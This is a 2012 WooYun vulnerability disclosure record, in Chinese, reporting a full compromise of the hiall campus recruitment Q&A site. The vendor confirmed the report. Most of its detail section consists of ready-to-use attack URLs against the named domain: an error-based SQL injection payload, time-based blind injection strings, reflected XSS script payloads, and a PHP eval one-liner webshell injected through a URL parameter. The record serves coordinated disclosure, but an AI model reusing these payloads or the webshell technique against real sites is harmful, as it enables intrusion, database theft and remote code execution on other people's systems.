漏洞概要 关注数(24) 关注此漏洞
缺陷编号:wooyun-2012-011473
漏洞标题:hiall某站彻底沦陷,强大的报错
相关厂商:hiall校园招聘
漏洞作者: 瘦蛟舞
提交时间:2012-09-24 16:40
修复时间:2012-11-08 16:41
公开时间:2012-11-08 16:41
漏洞类型:成功的入侵事件
危害等级:高
自评Rank:20
漏洞状态:厂商已经确认
漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]
Tags标签: 无
漏洞详情
披露状态:
2012-09-24: 细节已通知厂商并且等待厂商处理中
2012-09-29: 厂商已经确认,细节仅向厂商公开
2012-10-09: 细节向核心白帽子及相关领域专家公开
2012-10-19: 细节向普通白帽子公开
2012-10-29: 细节向实习白帽子公开
2012-11-08: 细节向公众公开
简要描述:
没有脱裤,没有留马
详细说明:
1.SQL注入
http://wenda.hiall.com.cn/index.php?a=detail&c=leaderboard&page=%5c&tid=26
http://wenda.hiall.com.cn/index.php?c=skillsets&firm=%27and%28select%201%20from%28select%20count%28*%29%2cconcat%28%28select%20concat%28CHAR%2852%29%2cCHAR%2867%29%2cCHAR%28117%29%2cCHAR%2886%29%2cCHAR%2890%29%2cCHAR%2884%29%2cCHAR%28115%29%2cCHAR%28105%29%2cCHAR%28121%29%2cCHAR%2866%29%2cCHAR%28114%29%29%20from%20information_schema.tables%20limit%200%2c1%29%2cfloor%28rand%280%29*2%29%29x%20from%20information_schema.tables%20group%20by%20x%29a%29and%27
2.盲注
http://wenda.hiall.com.cn/index.php?a=checktest&c=member&tid=113%20or%20%28sleep%282%29%2b1%29%20limit%201%20--
wenda.hiall.com.cn/index.php?c=skillsets&firm=-1%27%20or%2049%20%3d%20%2747
3.代码泄漏(见漏洞证明)
3.跨站
http://wenda.hiall.com.cn/?a=%22%3E%3Cscript%3Ealert%28%22magic%22%29%3C/script%3E&c=leaderboard&tid=null
http://wenda.hiall.com.cn/?a=1&c=%22%3E%3Cscript%3Ealert%28%22magic%22%29%3C/script%3E&tid=null
http://wenda.hiall.com.cn/index.php?a=logininfo&c=skillsets&firm=%22%3E%3Cscript%3Ealert%28%22magic%22%29%3C/script%3E
4.git泄漏(见漏洞证明)
5.一句话木马(彻底沦陷了)
http://wenda.hiall.com.cn/index.php?a=${@eval($_POST[admin])}\&c=test&cid=46
a,c是2个是神奇的参数
漏洞证明:
修复方案:
我看到企鹅了。=-=~
版权声明:转载请注明来源 瘦蛟舞@乌云
漏洞回应
厂商回应:
危害等级:高
漏洞Rank:20
确认时间:2012-09-29 09:56
厂商回复:
感谢瘦蛟舞完善了我们网站的安全系统,多谢。
最新状态:
暂无